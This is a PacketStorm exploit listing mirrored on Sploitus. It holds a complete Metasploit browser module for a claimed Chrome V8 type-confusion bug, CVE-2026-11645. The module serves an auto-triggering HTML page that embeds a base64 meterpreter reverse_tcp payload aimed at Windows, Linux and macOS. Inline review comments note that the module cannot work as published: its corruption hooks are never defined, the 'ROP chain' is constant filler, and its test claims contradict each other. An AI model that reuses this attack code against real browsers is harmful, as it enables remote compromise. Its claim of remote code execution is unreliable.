## https://sploitus.com/exploit?id=PACKETSTORM:223559
==================================================================================================================================
| # Title : Google Chrome 149.0.7827.103 Type Confusion Out of Bounds |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://chromereleases.googleblog.com |
==================================================================================================================================
[+] Summary : This module exploits a type confusion vulnerability in Google Chrome's V8 JavaScript engine, affecting versions prior to 149.0.7827.103.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Browser module labelled CVE-2026-11645. It serves one HTML page whose
  # script repeatedly instantiates a `class C extends Function` carrying a
  # computed class field, then calls two `window.*` hooks
  # (triggerCorruption, corruptArrayBuffer) that nothing in the served page
  # defines. The decoded payload therefore never reaches any corruption
  # primitive, and the "ROP chain" below is constant filler, so the RCE
  # outcome claimed in the description is not demonstrated by this file.
  Rank = GreatRanking

  # HttpServer supplies on_request_uri/send_response_html; BrowserAutopwn
  # registers the module with the autopwn framework. CmdStager is mixed in
  # but no method in this file calls into it (it is presumably what brings
  # generate_payload_exe into scope via the framework's EXE helpers — confirm).
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::CmdStager

  # Registers module metadata and three datastore options.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Google Chrome V8 Type Confusion Out-of-Bounds (CVE-2026-11645)',
        'Description' => %q{
This module exploits a type confusion vulnerability in Google Chrome's
V8 JavaScript engine, affecting versions prior to 149.0.7827.103.
The vulnerability is triggered by a specific pattern that causes type
confusion between internal V8 objects, leading to out-of-bounds memory
access. Successful exploitation can lead to remote code execution in
the context of the browser process.
Affected versions: Chrome < 149.0.7827.103
Tested on: Chrome 148.0.7827.103 (64-bit) on Windows 10
        },
        # NOTE(review): the page header above this listing reports a different
        # test environment (Firefox 151 on Windows 11); the tested
        # configuration stated here is unconfirmed.
        'Author' => ['indoushka'],
        'References' => [
          ['CVE', '2026-11645'],
          ['URL', 'https://chromereleases.googleblog.com/']
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['win', 'linux', 'osx'],
        'Arch' => [ARCH_X64],
        # Three x64 targets; each only changes the default payload. The served
        # page is identical for all of them (see generate_exploit_html).
        'Targets' => [
          [
            'Windows 10 - Chrome 148 (x64)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X64,
              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Linux - Chrome 148 (x64)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X64,
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'macOS - Chrome 148 (x64)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X64,
              'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2026-03-15',
        # The module itself declares that it may take the OS down and that it
        # leaves entries in logs (the server prints every User-Agent it sees
        # and the page carries fixed CVE-tagged title/heading strings).
        'Notes' => {
          'Stability' => [CRASH_OS_DOWN],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    # ITERATIONS -> JS `cycles` (setInterval loop count);
    # STRONG_RUNS -> JS `triggerCount` (runs per cycle);
    # AUTO_TRIGGER -> whether the interval loop or a single exploit() runs.
    register_options([
      OptInt.new('ITERATIONS', [false, 'Number of trigger iterations', 8]),
      OptInt.new('STRONG_RUNS', [false, 'Number of strong trigger runs', 5]),
      OptBool.new('AUTO_TRIGGER', [true, 'Auto-trigger exploit on page load', true])
    ])
  end

  # Serves the page for a single HTTP request.
  #
  # Gate: when the User-Agent contains "Chrome/<major>" and major >= 149 the
  # client gets the not-found reply instead of the page. A User-Agent with no
  # such token (or no User-Agent header at all, which `=~` tolerates as nil)
  # skips the gate and still receives the page, so the check only filters
  # self-identified patched Chrome builds.
  #
  # @param cli [Object] connected HTTP client, passed on to send_response_html
  # @param request [Object] parsed request; only headers['User-Agent'] is read
  # @return [void]
  def on_request_uri(cli, request)
    ua = request.headers['User-Agent']
    print_status("Incoming request from: #{ua}")
    if ua =~ /Chrome\/(\d+)/
      # $1 is the captured major version (Regexp.last_match(1) reads clearer).
      version = $1.to_i
      if version >= 149
        print_error("Target Chrome version #{version} is patched")
        send_not_found(cli)
        return
      else
        print_good("Target Chrome version #{version} appears vulnerable")
      end
    end
    html = generate_exploit_html
    send_response_html(cli, html)
  end

  # Builds the HTML/JS page. The three datastore values and the base64 payload
  # are interpolated straight into the heredoc (OptInt/OptBool values only, so
  # no free-form text reaches the script).
  #
  # What the embedded script demonstrably does:
  #   * log()                  appends timestamped text to #status and the
  #                            console; it takes one argument, so the
  #                            `log(..., "error")` call in exploit() silently
  #                            drops its second argument.
  #   * triggerTypeConfusion() instantiates C 800 times with value = 2, then
  #                            1500 times with value = 1.1; returns true unless
  #                            construction throws.
  #   * runStrongTrigger(n)    repeats that n times (n = STRONG_RUNS) and
  #                            returns true if any run returned true.
  #   * setupMemoryPrimitives() allocates a 0x1000-byte ArrayBuffer/DataView
  #                            and calls window.corruptArrayBuffer only if it
  #                            exists; its return value is never used.
  #   * exploitWithROP()       base64-decodes PAYLOAD_B64 into a Uint8Array,
  #                            creates an unused `func`, and calls
  #                            window.triggerCorruption only if it exists.
  #   * Neither window.corruptArrayBuffer nor window.triggerCorruption is
  #     defined anywhere in the page, so both calls are skipped and the
  #     decoded bytes are never used.
  #   * After a 1 s setTimeout, AUTO_TRIGGER selects either autoStressTest()
  #     (exploit() every 700 ms for ITERATIONS cycles, not awaited) or a
  #     single exploit() call.
  #
  # Naming caveat: Ruby `strong_runs` becomes JS `triggerCount`, while Ruby
  # `trigger_count` (ITERATIONS) becomes JS `cycles`.
  #
  # @return [String] the complete HTML document
  def generate_exploit_html
    trigger_count = datastore['ITERATIONS']
    strong_runs = datastore['STRONG_RUNS']
    auto_trigger = datastore['AUTO_TRIGGER'] ? 'true' : 'false'
    shellcode = generate_payload_shellcode
    b64_shellcode = Rex::Text.encode_base64(shellcode)
    html = <<~HTML
      <!DOCTYPE html>
      <html lang="en">
      <head>
      <meta charset="UTF-8">
      <title>CVE-2026-11645 - Chrome V8 RCE</title>
      </head>
      <body>
      <h1>CVE-2026-11645 - Chrome V8 Type Confusion RCE</h1>
      <p>Target: Chrome < 149.0.7827.103</p>
      <div id="status">Initializing exploit...</div>
      <script>
      const PAYLOAD_B64 = "#{b64_shellcode}";
      function log(msg) {
      const status = document.getElementById('status');
      status.innerHTML += '<br>[' + new Date().toLocaleTimeString() + '] ' + msg;
      console.log(msg);
      }
      function exploitWithROP() {
      log("Attempting to execute shellcode...");
      try {
      const shellcodeBytes = atob(PAYLOAD_B64);
      const shellcodeArray = new Uint8Array(shellcodeBytes.length);
      for (let i = 0; i < shellcodeBytes.length; i++) {
      shellcodeArray[i] = shellcodeBytes.charCodeAt(i);
      }
      var func = new Function('a', 'return a + 1');
      if (typeof window.triggerCorruption === 'function') {
      window.triggerCorruption(shellcodeArray);
      }
      log("Shellcode execution attempted");
      } catch(e) {
      log("Shellcode execution error: " + e);
      }
      }
      function triggerTypeConfusion() {
      try {
      let value = 2;
      class C extends Function {
      ['AA'] = value;
      }
      for (let i = 0; i < 800; i++) {
      new C("'use strict'");
      }
      value = 1.1;
      for (let i = 0; i < 1500; i++) {
      new C("'use strict'");
      }
      return true;
      } catch (e) {
      log("Trigger error: " + e.message);
      return false;
      }
      }
      function runStrongTrigger(count) {
      let success = false;
      for (let i = 0; i < count; i++) {
      log(`Strong trigger run ${i + 1}/${count}...`);
      if (triggerTypeConfusion()) {
      log(`Trigger ${i + 1} completed`);
      success = true;
      }
      }
      return success;
      }
      function setupMemoryPrimitives() {
      log("Setting up memory primitives...");
      var ab = new ArrayBuffer(0x1000);
      var dv = new DataView(ab);
      if (typeof window.corruptArrayBuffer === 'function') {
      window.corruptArrayBuffer(dv, 0x41414141);
      }
      return { dataView: dv };
      }
      async function exploit() {
      log("Starting CVE-2026-11645 exploit...");
      try {
      log("Triggering type confusion...");
      const triggerCount = #{strong_runs};
      if (!runStrongTrigger(triggerCount)) {
      log("Type confusion trigger failed!", "error");
      return false;
      }
      log("Type confusion triggered successfully!");
      const primitives = setupMemoryPrimitives();
      exploitWithROP();
      log("Exploit completed!");
      return true;
      } catch (e) {
      log("Exploit failed: " + e.message);
      return false;
      }
      }
      function autoStressTest(cycles = #{trigger_count}) {
      log(`Starting auto stress test (${cycles} cycles)...`);
      let interval = 0;
      let count = 0;
      function runCycle() {
      count++;
      log(`Cycle ${count}/${cycles}`);
      exploit();
      if (count >= cycles) {
      clearInterval(interval);
      log("Auto stress test completed.");
      }
      }
      interval = setInterval(runCycle, 700);
      return interval;
      }
      setTimeout(() => {
      if (#{auto_trigger}) {
      autoStressTest();
      } else {
      exploit();
      }
      }, 1000);
      </script>
      </body>
      </html>
    HTML
    # Return the interpolated document.
    html
  end

  # Builds the bytes that end up base64-encoded in PAYLOAD_B64.
  #
  # generate_payload_exe is not defined in this file; by its name it
  # presumably yields a complete executable image rather than
  # position-independent shellcode — TODO confirm against the framework. For
  # x64 targets (all three declared targets) the constant filler from
  # generate_rop_chain is prepended, so the result is "placeholder words +
  # executable", not a gadget chain followed by shellcode.
  #
  # @return [String] binary payload blob
  def generate_payload_shellcode
    payload = generate_payload_exe
    payload_shellcode = payload
    if target['Arch'] == ARCH_X64
      rop_chain = generate_rop_chain
      payload_shellcode = rop_chain + payload
    end
    payload_shellcode
  end

  # Returns four native-endian unsigned 64-bit words (`Q*`) of constant
  # 0x41/0x42/0x43 filler. These are not gadget addresses; nothing in this
  # file resolves any real address, so the name is aspirational.
  #
  # @return [String] 32-byte binary string
  def generate_rop_chain
    rop = [
      0x4141414141414141,
      0x4141414141414142,
      0x4242424242424242,
      0x4343434343434343
    ].pack('Q*')
    rop
  end

  # Replies with a minimal "404" body for self-identified patched clients.
  #
  # NOTE(review): HttpServer's send_response_html is (cli, body, headers) —
  # the third positional is a headers Hash, not a status code — so the 404
  # here is most likely not applied (and may raise when the helper iterates
  # the "headers"); verify against the framework version in use. The mixin
  # also appears to provide its own send_not_found, which this overrides.
  #
  # @param cli [Object] connected HTTP client
  # @return [void]
  def send_not_found(cli)
    send_response_html(cli, '<html><body><h1>404 Not Found</h1></body></html>', 404)
  end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================